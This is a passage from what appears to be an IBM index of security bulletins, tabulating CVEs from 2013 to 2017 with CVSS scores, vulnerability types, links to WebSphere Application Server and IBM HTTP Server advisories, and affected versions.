\n| CVE-2017-1788 | 5.3 | 
[Spoofing](<http://www-01.ibm.com/support/docview.wss?uid=swg22012341>) | Not affected | 9.0, Liberty \n| CVE-2017-1743 | 4.3 | [Information Disclosure](<http://www-01.ibm.com/support/docview.wss?uid=swg22013601>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2017-1741 | 4.3 | [Information Disclosure](<http://www-01.ibm.com/support/docview.wss?uid=swg22012342>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2017-1731 | 8.8 | [Privilege escalation](<http://www-01.ibm.com/support/docview.wss?uid=swg22012345>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2017-1681 | 4.0 | [Information Disclosure](<http://www-01.ibm.com/support/docview.wss?uid=swg22010419>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2017-1583 | 5.3 | [Information Disclosure](<http://www-01.ibm.com/support/docview.wss?uid=swg22008707>) | Not affected | 8.5, 8.0, Liberty \n| CVE-2017-1504 | 5.3 | [Weaker security](<http://www-01.ibm.com/support/docview.wss?uid=swg22006803>) | Not affected | 9.0 \n| CVE-2017-1503 | 6.1 | [HTTP response splitting](<http://www-01.ibm.com/support/docview.wss?uid=swg22006815>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2017-1501 | 5.9 | [Weaker security](<http://www-01.ibm.com/support/docview.wss?uid=swg22006810>) | Not affected | 9.0, 8.5, 8.0 \n| CVE-2017-1382 | 5.1 | [Insecure file permissions](<http://www-01.ibm.com/support/docview.wss?uid=swg22004785>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2017-1381 | 2.9 | [Information disclosure](<http://www-01.ibm.com/support/docview.wss?uid=swg22004792>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2017-1380 | 5.4 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg22004786>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2017-1194 | 4.3 | [Cross-site request forgery](<http://www-01.ibm.com/support/docview.wss?uid=swg22001226>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2017-1151 | 8.1 | [Privilege escalation](<http://www-01.ibm.com/support/docview.wss?uid=swg21999293>) | Not affected | 9.0, 
8.5, 8.0 \n| CVE-2017-1137 | 5.9 | [Weaker security](<http://www-01.ibm.com/support/docview.wss?uid=swg21998469>) | Not affected | 8.5, 8.0 \n| CVE-2017-1121 | 5.4 | [Cross-site scripting vulnerability](<http://www-01.ibm.com/support/docview.wss?uid=swg21997743>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n \n**2016 CVEs**\n\n**Name** | **CVE** | **CVSS Score** | **WebSphere Application Server Bulletin or Assessment** | **IBM HTTP Server Bulletin or Assessment** | **Versions Affected** \n---|---|---|---|---|--- \n| CVE-2016-1000031 | 9.8 | [Execute Code](<http://www-01.ibm.com/support/docview.wss?uid=swg22011428>) | Not affected | 9.0, 8.5, 8.0, Liberty \n| CVE-2016-9736 | 3.7 | [Information Disclosure](<http://www-01.ibm.com/support/docview.wss?uid=swg21991469>) | Not affected | 9.0, 8.5, 8.0 \n| CVE-2016-8934 | 5.4 | [Cross-site scripting vulnerability](<http://www-01.ibm.com/support/docview.wss?uid=swg21992315>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2016-8919 | 5.9 | [Denial of service](<http://www-01.ibm.com/support/docview.wss?uid=swg21993797>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2016-8743 | 6.1 | Not affected | [Response splitting attack](<http://www-01.ibm.com/support/docview.wss?uid=swg21996847>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2016-7056 | 4.0 | Not affected | [Vulnerability in GSKit Component](<http://www-01.ibm.com/support/docview.wss?uid=swg22015347>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2016-5986 | 3.7 | [Information Disclosure](<http://www-01.ibm.com/support/docview.wss?uid=swg21990056>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2016-5983 | 7.5 | [Gain Privileges](<http://www-01.ibm.com/support/docview.wss?uid=swg21990060>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2016-5597 | 5.9 | [IBM Java SDK for October 2016 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21993440>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2016-5573 | 8.3 | [IBM Java SDK for October 2016 
CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21993440>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2016-5549 | 6.5 | [IBM Java SDK for January 2017 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21998379>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2016-5548 | 6.5 | [IBM Java SDK for January 2017 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21998379>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2016-5547 | 5.3 | [IBM Java SDK for January 2017 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21998379>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2016-5546 | 7.5 | [IBM Java SDK for January 2017 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21998379>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \nHTTPOXY | CVE-2016-5387 | 8.1 | Not affected | [Redirect HTTP traffic](<http://www-01.ibm.com/support/docview.wss?uid=swg21988019>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2016-4975 | 6.1 | Not affected | Superseded by CVE-2016-8743 | 9.0, 8.5, 8.0, 7.0 \n| CVE-2016-4472 | 5.3 | Not affected | [Denial of Service with Expat](<http://www-01.ibm.com/support/docview.wss?uid=swg21988026>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2016-3485 | 2.9 | [IBM Java SDK for July 2016 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21988339>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2016-3427 | 10 | [IBM Java SDK for April 2016 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>) | Not affected | 8.5, 8.0, 7.0, Liberty \n| CVE-2016-3426 | 4.3 | [IBM Java SDK for April 2016 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21982223>) | Not affected | 8.5, 8.0, 7.0, Liberty \n| CVE-2016-3092 | 5.3 | [Apache Commons FileUpload Vulnerability](<http://www-01.ibm.com/support/docview.wss?uid=swg21987864>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2016-3042 | 5.4 | [Cross-site scripting vulnerability](<http://www-01.ibm.com/support/docview.wss?uid=swg21986716>) | Not affected | Liberty \n| 
CVE-2016-3040 | 6.3 | [Open Redirect Vulnerability](<http://www-01.ibm.com/support/docview.wss?uid=swg21986715>) | Not affected | Liberty \n| CVE-2016-2960 | 3.7 | [Denial of Service with SIP Services](<http://www-01.ibm.com/support/docview.wss?uid=swg21984796>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2016-2945 | 5.0 | [Weaker security in Liberty API discovery feature](<http://www-01.ibm.com/support/docview.wss?uid=swg21984502>) | Not affected | Liberty \n| CVE-2016-2923 | 5.3 | [Information Disclosure vulnerability](<http://www-01.ibm.com/support/docview.wss?uid=swg21983700>) | Not affected | Liberty \nSWEET32 | CVE-2016-2183 | 3.7 | [IBM Java SDK for January 2017 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21998379>) | [IBM HTTP Server and Sweet32](<http://www-01.ibm.com/support/docview.wss?uid=swg21991548>) (21 Dec 2017) | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2016-1182 | 4.8 | [Bypass Security Restrictions](<http://www-01.ibm.com/support/docview.wss?uid=swg21985995>); [Bypass Security Restrictions UDDI](<http://www-01.ibm.com/support/docview.wss?uid=swg22016214>) (21 June 2018) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2016-1181 | 8.1 | [Execute Code](<http://www-01.ibm.com/support/docview.wss?uid=swg21985995>); [Execute Code UDDI](<http://www-01.ibm.com/support/docview.wss?uid=swg22016214>) (21 June 2018) | Not affected | 9.0, 8.5, 8.0, 7.0 \n
DROWN | CVE-2016-0800 | | [Not affected bulletin](<http://www-01.ibm.com/support/docview.wss?uid=swg21978292>) | [Not affected bulletin](<http://www-01.ibm.com/support/docview.wss?uid=swg21978317>) | \n| CVE-2016-0718 | 9.8 | Not affected | [Denial of Service with Expat](<http://www-01.ibm.com/support/docview.wss?uid=swg21988026>) (13 Sept 2016) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2016-0702 | 2.9 | Not affected | [Vulnerability in GSKit Component](<http://www-01.ibm.com/support/docview.wss?uid=swg22015347>) | 9.0, 8.5, 8.0 \n| CVE-2016-0488 | 4.0 | [IBM Java SDK for January 2016 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21975424>) | Not affected | 8.5, 8.0, 7.0, Liberty \n| CVE-2016-0475 | 5.8 | [IBM Java SDK for January 2016 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21975424>) | Not affected | 8.5, 8.0, 7.0, Liberty \n| CVE-2016-0466 | 5.0 | [IBM Java SDK for January 2016 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21975424>) | Not affected | 8.5, 8.0, 7.0, Liberty \n| CVE-2016-0389 | 5.3 | [Information Disclosure Vulnerability](<http://www-01.ibm.com/support/docview.wss?uid=swg21982012>) | Not affected | Liberty \n| CVE-2016-0385 | 3.1 | [Bypass security restrictions](<http://www-01.ibm.com/support/docview.wss?uid=swg21982588>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2016-0378 | 3.7 | [Information Disclosure Vulnerability](<http://www-01.ibm.com/support/docview.wss?uid=swg21981529>) | Not affected | Liberty \n| CVE-2016-0377 | 4.3 | [Information Disclosure vulnerability](<http://www-01.ibm.com/support/docview.wss?uid=swg21980645>) | Not affected | 8.5, 8.0, 7.0 \n| CVE-2016-0360 | 8.1 | [Deserialize objects with MQ Resource adapter](<http://www-01.ibm.com/support/docview.wss?uid=swg21996748>) (14 Mar 2017) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2016-0359 | 6.1 | [HTTP Response Splitting](<http://www-01.ibm.com/support/docview.wss?uid=swg21982526>) | Not affected | 8.5, 8.0, 7.0, Liberty \n| CVE-2016-0306 | 
3.7 | [Security vulnerability if FIPS 140-2 is enabled](<http://www-01.ibm.com/support/docview.wss?uid=swg21979231>) | Not affected | 8.5, 8.0, 7.0, Liberty \n| CVE-2016-0283 | 6.1 | [Cross-site scripting vulnerability](<http://www-01.ibm.com/support/docview.wss?uid=swg21978293>) | Not affected | Liberty \n| CVE-2016-0201 | 5.9 | Not affected | [Vulnerability in GSKit component](<http://www-01.ibm.com/support/docview.wss?uid=swg21974507>) | 8.5, 8.0, 7.0 \n \n**2015 CVEs**\n\n**Name** | **CVE** | **CVSS Score** | **WebSphere Application Server Bulletin or Assessment** | **IBM HTTP Server Bulletin or Assessment** | **Versions Affected** \n---|---|---|---|---|--- \nSLOTH | CVE-2015-7575 | 7.1 | [IBM Java SDK for January 2016 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21975424>) | Not affected | 8.5, 8.0, 7.0, Liberty \n| CVE-2015-7450 | 9.8 | [Vulnerability in Apache Commons affects IBM WebSphere Application Server](<https://www-01.ibm.com/support/docview.wss?uid=swg21970575>) (21 Dec 2017); [Knowledge Center updates](<https://www.ibm.com/support/pages/node/1107105>) (14 Nov 2019) | Not affected | 8.5, 8.0, 7.0, Liberty; 9.0 (Knowledge Center updates) \n| CVE-2015-7420 | 3.7 | Not affected | [Vulnerability in GSKit component](<http://www-01.ibm.com/support/docview.wss?uid=swg21974507>) | 8.5, 8.0, 7.0 \n| CVE-2015-7417 | 5.4 | [Cross-site scripting with OAuth](<http://www-01.ibm.com/support/docview.wss?uid=swg21974520>) | Not affected | 8.5, 8.0, 7.0, Liberty \n| CVE-2015-5262 | 5.3 | [Denial of Service](<https://www.ibm.com/support/pages/node/6453091>) | Not affected | 9.0, 8.5, 8.0 \n| CVE-2015-5006 | 4.6 | [IBM Java SDK for October 2015 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21969620>) | Not affected | 8.5, 8.0, 7.0, 6.1, Liberty \n| CVE-2015-4947 | 7.5 | Not affected | [Stack buffer overflow](<http://www-01.ibm.com/support/docview.wss?uid=swg21965419>) | 8.5, 8.0, 7.0, 6.1 \n| CVE-2015-4938 | 3.5 | [Spoof 
servlet vulnerabilities](<http://www-01.ibm.com/support/docview.wss?uid=swg21963275>) | | 8.5, 8.0, 7.0, Liberty \n| CVE-2015-4872 | 5.0 | [IBM Java SDK for October 2015 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21969620>) | Not affected | 8.5, 8.0, 7.0, 6.1, Liberty \n| CVE-2015-4749 | 4.3 | [IBM Java SDK for July 2015 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21962931>) | Not affected | 8.5, 8.0, 7.0, 6.1, Liberty \n| CVE-2015-4734 | 5.0 | [IBM Java SDK for October 2015 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21969620>) | Not affected | 8.5, 8.0, 7.0, 6.1, Liberty \nLogjam | CVE-2015-4000 | 4.3 | [Logjam with Diffie-Hellman ciphers](<http://www-01.ibm.com/support/docview.wss?uid=swg21957980>) | Not affected | 8.5, 8.0, 7.0, 6.1, Liberty \n| CVE-2015-3183 | 6.1 | Not affected | [HTTP Request smuggling](<http://www-01.ibm.com/support/docview.wss?uid=swg21963361>) | 8.5, 8.0, 7.0, 6.1 \nBar Mitzvah | CVE-2015-2808 | 5.0 | [Vulnerability in RC4 stream cipher affects WebSphere Application Server](<https://www-01.ibm.com/support/docview.wss?uid=swg21701503>) | [Vulnerability in RC4 stream cipher affects IBM HTTP Server and Caching Proxy](<https://www-01.ibm.com/support/docview.wss?uid=swg21701072>) | 8.5, 8.0, 7.0, 6.1, Liberty \n| CVE-2015-2625 | 2.6 | [IBM Java SDK for July 2015 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21962931>) | Not affected | 8.5, 8.0, 7.0, 6.1, Liberty \n| CVE-2015-2613 | 5.0 | [IBM Java SDK for July 2015 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21962931>) | Not affected | 8.5, 8.0, 7.0, 6.1, Liberty \n| CVE-2015-2601 | 5.0 | [IBM Java SDK for July 2015 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21962931>) | Not affected | 8.5, 8.0, 7.0, 6.1, Liberty \n| CVE-2015-2017 | 5.0 | [HTTP response splitting attack](<http://www-01.ibm.com/support/docview.wss?uid=swg21966837>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2015-1946 | 4.1 | [Gain elevated 
privileges](<http://www-01.ibm.com/support/docview.wss?uid=swg21959083>) | Not affected | 8.5, 8.0, 7.0 \n| CVE-2015-1936 | 4 | [Hijack users session vulnerability](<http://www-01.ibm.com/support/docview.wss?uid=swg21959083>) | Not affected | 8.5, 8.0 \n| CVE-2015-1932 | 5 | [Information Disclosure vulnerability](<http://www-01.ibm.com/support/docview.wss?uid=swg21963275>) | Not affected | 8.5, 8.0, 7.0 \n| CVE-2015-1931 | 2.1 | [IBM Java SDK for July 2015 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21962931>) | Not affected | 8.5, 8.0, 7.0, 6.1, Liberty \n| CVE-2015-1927 | 6.8 | [Gain elevated privileges vulnerability](<http://www-01.ibm.com/support/docview.wss?uid=swg21959083>) | Not affected | 8.5, 8.0, 7.0, Liberty \n| CVE-2015-1920 | 9.3 | [Security vulnerability with management port in WebSphere Application Server](<http://www-01.ibm.com/support/docview.wss?uid=swg21883573>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2015-1916 | 5.0 | [IBM Java SDK for April 2015 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21902260>) | Not affected | 8.5, 8.0, 7.0, 6.1, Liberty \n| CVE-2015-1885 | 9.3 | [Gain elevated privileges with OAuth grant password](<http://www-01.ibm.com/support/docview.wss?uid=swg21697368>) | Not affected | 8.5, 8.0, 7.0, Liberty \n| CVE-2015-1882 | 8.5 | [Gain elevated privileges with EJB](<http://www-01.ibm.com/support/docview.wss?uid=swg21697368>) | Not affected | Liberty \n| CVE-2015-1829 | 5.0 | Not affected | [Denial of Service on Windows with IBM HTTP Server](<http://www-01.ibm.com/support/docview.wss?uid=swg21959081>) | 8.5, 8.0, 7.0, 6.1 \n| CVE-2015-1788 | 5.0 | Not affected | [Denial of Service in GSKIT with IBM HTTP Server](<http://www-01.ibm.com/support/docview.wss?uid=swg21963362>) | 8.5, 8.0 \n| CVE-2015-1283 | 6.8 | Not affected | [Denial of Service with IBM HTTP Server](<http://www-01.ibm.com/support/docview.wss?uid=swg21964428>) | 8.5, 8.0, 7.0, 6.1 \n| CVE-2015-0899 | 4.3 | [Bypass 
security](<http://www-01.ibm.com/support/docview.wss?uid=swg22015348>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2015-0488 | 5.0 | [IBM Java SDK for April 2015 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21902260>) | Not affected | 8.5, 8.0, 7.0, 6.1, Liberty \n| CVE-2015-0478 | 4.3 | [IBM Java SDK for April 2015 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21902260>) | Not affected | 8.5, 8.0, 7.0, 6.1, Liberty \n| CVE-2015-0410 | 5.0 | [IBM Java SDK for January 2015 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21695362>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2015-0400 | 5.0 | [IBM Java SDK for January 2015 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21695362>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2015-0254 | 7.5 | [Security vulnerability in Apache Standard Taglibs](<http://www-01.ibm.com/support/docview.wss?uid=swg21978495>) | Not affected | 8.5, 8.0, 7.0, 6.1, Liberty \n| CVE-2015-0250 | 4.3 | [Security vulnerability in Apache Batik](<http://www-01.ibm.com/support/docview.wss?uid=swg21959083>) | Not affected | 8.5, 8.0, 7.0, 6.1 \nGhost | CVE-2015-0235 | | Not affected | Not affected | \n| CVE-2015-0226 | 5.0 | [Security vulnerability in Apache WSS4J](<http://www-01.ibm.com/support/docview.wss?uid=swg21959083>) | Not affected | 8.5 \n| CVE-2015-0204 | 4.3 | [IBM Java SDK for April 2015 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21902260>) | Not affected | 8.5, 8.0, 7.0, 6.1, Liberty \n| CVE-2015-0174 | 3.5 | [Information disclosure with SNMP](<http://www-01.ibm.com/support/docview.wss?uid=swg21697368>) | Not affected | 8.5 \n| CVE-2015-0175 | 4.0 | [Gain elevated privileges with authData elements](<http://www-01.ibm.com/support/docview.wss?uid=swg21697368>) | Not affected | Liberty \nFREAK | CVE-2015-0138 | 4.3 | [Vulnerability with RSA export Keys affects WebSphere Application Server](<http://www-01.ibm.com/support/docview.wss?uid=swg21698613>) | [Vulnerability with RSA export keys affects IBM 
HTTP Server](<http://www-01.ibm.com/support/docview.wss?uid=swg21698959>) | 8.5, 8.0, 7.0, 6.1, Liberty \n \n**2014 CVEs**\n\n**Name** | **CVE** | **CVSS Score** | **WebSphere Application Server Bulletin or Assessment** | **IBM HTTP Server Bulletin or Assessment** | **Versions Affected** \n---|---|---|---|---|--- \n| CVE-2014-8917 | 4.3 | [Cross-site Scripting in Dojo Toolkit](<http://www-01.ibm.com/support/docview.wss?uid=swg21697284>) | Not affected | 8.5, 8.0 \n| CVE-2014-8890 | 5.1 | [Elevated Privileges in Liberty](<http://www-01.ibm.com/support/docview.wss?uid=swg21690185>) | Not affected | Liberty \nTLS Padding | CVE-2014-8730 | 4.3 | [Not affected bulletin](<http://www-01.ibm.com/support/docview.wss?uid=swg21692484>) | [TLS Padding in IBM HTTP Server](<http://www-01.ibm.com/support/docview.wss?uid=swg21692502>) | 8.5, 8.0, 7.0, 6.1 \n| CVE-2014-7810 | 5.0 | [Bypass security](<https://www-01.ibm.com/support/docview.wss?uid=ibm10729557>) | [Bypass security](<https://www-01.ibm.com/support/docview.wss?uid=ibm10729557>) | 9.0, 8.5, 8.0, 7.0, Liberty \nShellshock | CVE-2014-7189, CVE-2014-7186, CVE-2014-7169, CVE-2014-6278, CVE-2014-6277, CVE-2014-6271 | | [Bash Vulnerabilities](<http://www-01.ibm.com/support/docview.wss?uid=swg21685433>) (not affected, but applications could be) | [Bash Vulnerabilities](<http://www-01.ibm.com/support/docview.wss?uid=swg21685433>) (not affected, but applications could be) | Customer application might be vulnerable \n| CVE-2014-6593 | 4.0 | [IBM Java SDK for January 2015 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21695362>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2014-6558 | 2.6 | [IBM Java SDK for October 2014 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21687740>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2014-6512 | 4.3 | [IBM Java SDK for October 2014 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21687740>) | Not affected | 8.5, 8.0, 7.0, 6.1 
\n| CVE-2014-6457 | 4.0 | [IBM Java SDK for October 2014 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21687740>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2014-6174 | 4.3 | [Clickjacking vulnerability](<http://www-01.ibm.com/support/docview.wss?uid=swg21690185>) | Not affected | 8.5, 8.0, 7.0 \n| CVE-2014-6167 | | [Cross-site scripting](<https://www-304.ibm.com/support/docview.wss?uid=swg21682767>) | Not affected | 8.5, 8.0, 7.0, Liberty \n| CVE-2014-6166 | 5.0 | [Obtain sensitive information](<http://www-01.ibm.com/support/docview.wss?uid=swg21690185>) | Not affected | 8.5, 8.0 \n| CVE-2014-6164 | 4.3 | [Spoofing vulnerability](<http://www-01.ibm.com/support/docview.wss?uid=swg21690185>) | Not affected | 8.5 \n| CVE-2014-4816 | 3.5 | Not affected | [Cross-site scripting vulnerability](<https://www-304.ibm.com/support/docview.wss?uid=swg21682767>) | 8.5, 8.0, 7.0, 6.1, 6.0 \n| CVE-2014-4770 | 3.5 | Not affected | [Cross-site request forgery](<https://www-304.ibm.com/support/docview.wss?uid=swg21682767>) | 8.5, 8.0, 7.0, 6.1, 6.0 \n| CVE-2014-4767 | 4.3 | [Weaker than expected security](<http://www-01.ibm.com/support/docview.wss?uid=swg21681249>) | Not affected | Liberty \n| CVE-2014-4764 | 7.1 | [Denial of service](<http://www-01.ibm.com/support/docview.wss?uid=swg21681249>) | Not affected | 8.5, 8.0 \n| CVE-2014-4263 | 4.0 | [IBM Java SDK for July 2014 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21680418>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2014-4244 | 4.0 | [IBM Java SDK for July 2014 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21680418>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2014-3603 | 6.5 | [Spoofing](<https://www.ibm.com/support/pages/node/964764>) | Not affected | Liberty \n| CVE-2014-3577 | 4.3 | [Spoofing Vulnerability](<https://www.ibm.com/support/pages/node/6453091>) | Not affected | 9.0, 8.5, 8.0 \nPOODLE | CVE-2014-3566 | 4.3 | [IBM Java SDK for October 2014 
CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21687740>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2014-3083 | 5.0 | [Obtain sensitive information](<http://www-01.ibm.com/support/docview.wss?uid=swg21681249>) | Not affected | 8.5, 8.0, 7.0, Liberty \n| CVE-2014-3070 | 5.0 | [Obtain sensitive information](<http://www-01.ibm.com/support/docview.wss?uid=swg21676222>) | Not affected | 8.5, 8.0 \n| CVE-2014-3068 | 2.4 | [IBM Java SDK for July 2014 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21680418>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2014-3022 | 5.0 | [Bypass security](<https://www-304.ibm.com/support/docview.wss?uid=swg21676222>) | Not affected | 8.5, 8.0 \n| CVE-2014-3021 | 5.0 | [Obtain sensitive information](<http://www-01.ibm.com/support/docview.wss?uid=swg21690185>) | Not affected | 8.5, 8.0, 7.0 \n| CVE-2014-0965 | 4.3 | [Obtain sensitive information](<http://www-01.ibm.com/support/docview.wss?uid=swg21681249>) | Not affected | 8.5, 8.0, 7.0 \n| CVE-2014-0964 | 7.1 | [Denial of service](<http://www-01.ibm.com/support/docview.wss?uid=swg21671835>) | Not affected | 6.1 \n| CVE-2014-0963 | 7.1 | Not affected | [CPU exhaustion](<https://www-304.ibm.com/support/docview.wss?uid=swg21672843>) | 8.5, 8.0, 7.0, 6.1, 6.0 \n| CVE-2014-0896 | 4.3 | [Obtain sensitive information](<http://www-01.ibm.com/support/docview.wss?uid=swg21669554>) | Not affected | Liberty \n| CVE-2014-0891 | 5.0 | [Obtain sensitive information](<http://www-01.ibm.com/support/docview.wss?uid=swg21669554>) | Not affected | 8.5, 8.0, 7.0 \n| CVE-2014-0878 | 5.8 | [IBM Java SDK for April 2014 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21673013>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2014-0859 | 5.0 | [Denial of service](<http://www-01.ibm.com/support/docview.wss?uid=swg21669554>) | Not affected | 8.5, 8.0, 7.0, Liberty \n| CVE-2014-0857 | 4.0 | [Obtain Information](<http://www-01.ibm.com/support/docview.wss?uid=swg21671835>) | Not affected | 8.5, 8.0 \n| 
CVE-2014-0823 | 4.3 | [View Files](<http://www-01.ibm.com/support/docview.wss?uid=swg21671835>) | Not affected | 8.5, 8.0, Liberty \n| CVE-2014-0460 | 5.8 | [IBM Java SDK for April 2014 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21673013>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2014-0453 | 4.0 | [IBM Java SDK for April 2014 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21673013>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2014-0411 | 4.0 | [IBM Java SDK for January 2014 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21663938>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2014-0231 | 5.0 | Not affected | [Denial of Service](<https://www-304.ibm.com/support/docview.wss?uid=swg21672428>) | 8.5, 8.0, 7.0, 6.1, 6.0 \n| CVE-2014-0226 | 7.5 | Not affected | [Heap buffer overflow](<https://www-304.ibm.com/support/docview.wss?uid=swg21672428>) | 8.5, 8.0, 7.0, 6.1, 6.0 \nHeartbleed | CVE-2014-0160 | | [Not affected Bulletin](<http://www-01.ibm.com/support/docview.wss?uid=swg21669774>) | [Not affected Bulletin](<http://www-01.ibm.com/support/docview.wss?uid=swg21669774>) | \n| CVE-2014-0118 | 5.0 | Not affected | [Denial of Service](<https://www-304.ibm.com/support/docview.wss?uid=swg21672428>) | 8.5, 8.0, 7.0, 6.1, 6.0 \n| CVE-2014-0114 | 7.5 | [Execute code](<http://www-01.ibm.com/support/docview.wss?uid=swg21672316>); [Execute code UDDI](<http://www-01.ibm.com/support/docview.wss?uid=swg22016214>) (21 June 2018) | Not affected | 7.0, 6.1; 9.0, 8.5, 8.0, 7.0 (UDDI bulletin) \n| CVE-2014-0098 | 5.0 | Not affected | [Denial of service](<https://www-304.ibm.com/support/docview.wss?uid=swg21667526>) | 8.5, 8.0, 7.0, 6.1 \n| CVE-2014-0076 | 2.1 | Not affected | [Information Disclosure](<http://www-01.ibm.com/support/docview.wss?uid=swg21681249>) | 8.5, 8.0 \n| CVE-2014-0050 | 5.0 | [Denial of service](<http://www-01.ibm.com/support/docview.wss?uid=swg21667254>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n \n**2013 CVEs**\n\n
**Name** | **CVE** | **CVSS Score** | **WebSphere Application Server Bulletin or Assessment** | **IBM HTTP Server Bulletin or Assessment** | **Versions Affected** \n---|---|---|---|---|--- \n| CVE-2013-6747 | 7.1 | Not affected | [Denial of Service](<http://www-01.ibm.com/support/docview.wss?uid=swg21669554>) | 8.5, 8.0, 7.0 \n| CVE-2013-6738 | 4.3 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21669554>) | Not affected | 8.5, 8.0, 7.0, Liberty \n| CVE-2013-6725 | 3.5 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21661323>) | Not affected | 8.5, 8.0, 7.0 \n| CVE-2013-6440 | 4.3 | [XML External Entity](<http://www-01.ibm.com/support/docview.wss?uid=swg22010415>) | Not affected | Liberty \n| CVE-2013-6438 | 4.3 | Not affected | [Buffer overflow](<http://www-01.ibm.com/support/docview.wss?uid=swg21669554>) | 8.5, 8.0, 7.0 \n| CVE-2013-6330 | 2.1 | [Obtain sensitive information](<http://www-01.ibm.com/support/docview.wss?uid=swg21661323>) | Not affected | 7.0 \n| CVE-2013-6329 | 7.8 | Not affected | [Denial of Service](<http://www-01.ibm.com/support/docview.wss?uid=swg21659548>) | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-6325 | 4.3 | [Denial of Service](<http://www-01.ibm.com/support/docview.wss?uid=swg21661323>) | Not affected | 8.5, 8.0, 7.0 \n| CVE-2013-6323 | 